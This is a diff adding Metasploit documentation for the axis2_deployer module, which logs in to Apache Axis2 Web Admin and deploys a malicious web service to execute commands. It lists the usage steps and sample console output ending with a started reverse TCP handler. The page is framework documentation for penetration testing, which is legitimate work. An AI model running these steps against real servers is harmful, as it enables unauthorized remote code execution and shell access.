|
| 1 | +## Description |
| 2 | + |
| 3 | +This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP. |
| 4 | + |
| 5 | +## Axis2 Web Admin |
| 6 | + |
| 7 | +The Apache Axis2 Web application has three main sections:'Services' lists all the available services deployed in this server, 'Validate' checks the system to see whether all the required libraries are in place and views the system information, and 'Administration' is the Axis2 Web Administration module which is the console for administering the Apache Axis2 installation. The Axis2 Web Administration module provides a way to configure Axis2 dynamically. |
| 8 | + |
| 9 | +**IMPORTANT:** This dynamic configuration will NOT be persistent, i.e., if the servlet container is restarted, then all the dynamic configuration changes will be lost. |
| 10 | + |
| 11 | +## Verification Steps |
| 12 | + |
| 13 | +1. Do: ```use exploit/multi/http/axis2_deployer``` |
| 14 | +2. Do: ```set RHOSTS [IP]``` |
| 15 | +3. Do: ```set RPORT [PORT]``` |
| 16 | +3. Do: ```set USERNAME [Username]``` |
| 17 | +4. Do: ```set PASSWORD [Password]``` |
| 18 | +5. Do: ```run``` |
| 19 | + |
| 20 | +## Sample Output |
| 21 | + |
| 22 | +``` |
| 23 | +msf > use exploit/multi/http/axis2_deployer |
| 24 | +msf exploit(axis2_deployer) > set RHOST 10.10.155.37 |
| 25 | +RHOST => 10.10.155.37 |
| 26 | +msf exploit(axis2_deployer) > set RPORT 8080 |
| 27 | +RPORT => 8080 |
| 28 | +msf exploit(axis2_deployer) > set USERNAME admin |
| 29 | +USERNAME => admin |
| 30 | +msf exploit(axis2_deployer) > set PASSWORD admin123 |
| 31 | +PASSWORD => admin123 |
| 32 | +msf exploit(axis2_deployer) > show options |
| 33 | +
|
| 34 | +Module options (exploit/multi/http/axis2_deployer): |
| 35 | +
|
| 36 | + Name Current Setting Required Description |
| 37 | + ---- --------------- -------- ----------- |
| 38 | + PASSWORD admin123 no The password for the specified username |
| 39 | + PATH /axis2 yes The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects) |
| 40 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 41 | + RHOST 10.10.155.37 yes The target address |
| 42 | + RPORT 8080 yes The target port |
| 43 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 44 | + USERNAME admin no The username to authenticate as |
| 45 | + VHOST no HTTP server virtual host |
| 46 | +
|
| 47 | +
|
| 48 | +Exploit target: |
| 49 | +
|
| 50 | + Id Name |
| 51 | + -- ---- |
| 52 | + 0 Java |
| 53 | +
|
| 54 | +msf exploit(axis2_deployer) > exploit |
| 55 | +
|
| 56 | +[*] Started reverse TCP handler on 10.10.155.39:4444 |
| 57 | +
|
| 58 | +``` |
0 commit comments